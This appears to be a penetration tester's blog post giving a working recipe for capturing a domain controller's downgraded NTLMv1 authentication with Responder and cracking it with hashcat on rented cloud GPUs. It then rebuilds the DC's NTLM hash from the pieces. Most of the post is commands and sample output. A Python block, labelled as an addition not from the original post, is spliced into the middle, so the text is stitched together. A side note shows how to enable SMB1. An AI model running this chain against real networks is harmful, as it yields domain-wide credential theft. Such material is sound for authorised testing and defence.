Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here’s my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller. Let’s start with a sample blob you’ll get out of the ntlmv1-multi tool:

Hostname: tangent
Username: TT-DC01$
Challenge: 1122334455667788
LM Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097
NT Response: 14B8DF571CF877A87CEAB088CDD163868819D23E095B0097
CT1: 14B8DF571CF877A8
CT2: 7CEAB088CDD16386
CT3: 8819D23E095B0097

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788

To crack with hashcat create a file with the following contents:
14B8DF571CF877A8:1122334455667788
7CEAB088CDD16386:1122334455667788

echo "14B8DF571CF877A8:1122334455667788">>14000.hash
echo "7CEAB088CDD16386:1122334455667788">>14000.hash

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:14B8DF571CF877A87CEAB088CDD163868819D23E095B0097

First, put this in a file called 14000.hash (one hash per line):

14B8DF571CF877A8:1122334455667788
7CEAB088CDD16386:1122334455667788

Now crack with vast.ai using hashcat:

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1

The results will look something like this:

14B8DF571CF877A8:1122334455667788:$HEX[STRING1]
7CEAB088CDD16386:1122334455667788:$HEX[STRING2]

(STRING1 and STRING2 will be needed in the next steps)

Then calculate the last 4 characters of the hash:

./ct3_to_ntlm.bin 8819D23E095B0097 1122334455667788
LAST4

(I’m calling the result of this command LAST4)

Now take each hex string and run the deskey_to_ntlm.pl tool on it:

hashcat-utils/src/deskey_to_ntlm.pl STRING1
PART1
hashcat-utils/src/deskey_to_ntlm.pl STRING2
PART2

(I’m calling the result of these commands PART1 and PART2)

Now stitch it all together:
PART1+PART2+LAST4

(Note: don’t actually include the + in stitching the strings together)
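As an added illustration (not from the original post or from the tools it names), here is the NTLMv1 key split that lets the NT response be recovered in three independent pieces, plus the stitching step above as code. It assumes hashcat prints the recovered 8-byte DES key (parity bits included) inside $HEX[...] and that deskey_to_ntlm.pl strips those parity bits; the NTLM hash below is constructed, and no DES encryption is performed.

```python
# Added example, not from the original post or from hashcat-utils/ntlmv1-multi.
# Shows the NTLMv1 (MS-NLMP) key derivation and the PART1+PART2+LAST4 reassembly.
# Assumption: hashcat -m 14000 outputs the 8-byte DES key with parity bits, which
# deskey_to_ntlm.pl reduces to the 7 underlying hash bytes (14 hex characters).

def ntlm_to_des_keys(ntlm_hash: bytes) -> list:
    """The 16-byte NTLM hash is zero-padded to 21 bytes and cut into three
    7-byte DES keys; each encrypts the 8-byte challenge to give CT1..CT3."""
    padded = ntlm_hash + b"\x00" * 5
    return [padded[i:i + 7] for i in (0, 7, 14)]

def expand_des_key(raw7: bytes) -> bytes:
    """56 key bits -> 8 bytes, each carrying 7 key bits plus an odd-parity bit."""
    bits = int.from_bytes(raw7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        parity = 0 if bin(seven).count("1") % 2 else 1
        out.append((seven << 1) | parity)
    return bytes(out)

def deskey_to_raw(key8: bytes) -> bytes:
    """Inverse of expand_des_key: drop each parity bit, giving the 7 hash
    bytes (what deskey_to_ntlm.pl prints as PART1 / PART2)."""
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")

def reconstruct_ntlm(string1: str, string2: str, last4: str) -> str:
    """Stitch PART1 + PART2 + LAST4 (no '+' characters) into the 32-hex NTLM hash."""
    part1 = deskey_to_raw(bytes.fromhex(string1)).hex()
    part2 = deskey_to_raw(bytes.fromhex(string2)).hex()
    return (part1 + part2 + last4).upper()

# Constructed sample NTLM hash (not a real account's hash).
SAMPLE_NTLM = "0123456789abcdef0123456789abcdef"

def demo() -> str:
    """Round trip: derive the DES keys, then rebuild the hash the way the post does."""
    k1, k2, k3 = ntlm_to_des_keys(bytes.fromhex(SAMPLE_NTLM))
    assert k3[2:] == b"\x00" * 5          # third key has only 2 unknown bytes: 65536 guesses
    string1 = expand_des_key(k1).hex()    # stands in for hashcat's $HEX[STRING1]
    string2 = expand_des_key(k2).hex()    # stands in for hashcat's $HEX[STRING2]
    return reconstruct_ntlm(string1, string2, SAMPLE_NTLM[-4:])

if __name__ == "__main__":
    print(demo())
```

The tiny third key is why ct3_to_ntlm.bin finishes instantly, and the challenge-independent key split is why the two DES pieces can be cracked separately.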

Side note: in my lab the Responder downgrade attack wouldn’t work correctly, and I eventually found out it was because my freshly installed DC didn’t support SMB1. I installed/enabled it with:

Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol

Written by: Brian Johnson